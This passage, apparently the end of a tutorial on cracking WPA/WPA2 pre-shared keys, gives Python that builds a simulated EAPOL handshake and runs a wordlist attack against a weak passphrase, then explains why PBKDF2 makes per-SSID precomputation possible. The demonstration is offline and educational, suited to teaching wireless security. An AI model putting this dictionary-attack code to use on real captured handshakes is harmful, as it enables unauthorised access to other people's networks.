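SPA = bytes.fromhex("66778899aabb")         # client MAC address
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 with the 16-byte MIC field zeroed (layout only sketched)
EAPOL_MSG2 = (b"\x01\x03\x00\x75"                       # version, type=Key, body length
              + b"\x02" + b"\x01\x0a" + b"\x00\x00"      # descriptor, key info, key length
              + b"\x00" * 7 + b"\x01"                    # replay counter
              + SNONCE + bytes(16) + bytes(8) + bytes(8) # nonce, key IV, RSC, ID
              + bytes(16)                                # MIC field (zeroed)
              + b"\x00\x16" + b"\x30\x14" + bytes(20))   # key data length, RSN IE
WORDLIST = ["password", "letmein", "sunflower42", "qwerty123"]

def simulate_capture(passphrase: str) -> bytes:
    """The MIC the real client put on message 2; a sniffer reads it off the air."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MSG2)

if __name__ == "__main__":
    mic = simulate_capture("sunflower42")   # the network's (weak) passphrase
    print(crack_psk(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_MSG2, mic, WORDLIST))
```

The cost per candidate is one PBKDF2 run of 4096 SHA-1 iterations, which is what makes the attack slow per guess but trivially parallel (and precomputable per SSID, which is what coWPAtty's genpmk tables exploit); the only thing that stops it is a passphrase that is not in any wordlist.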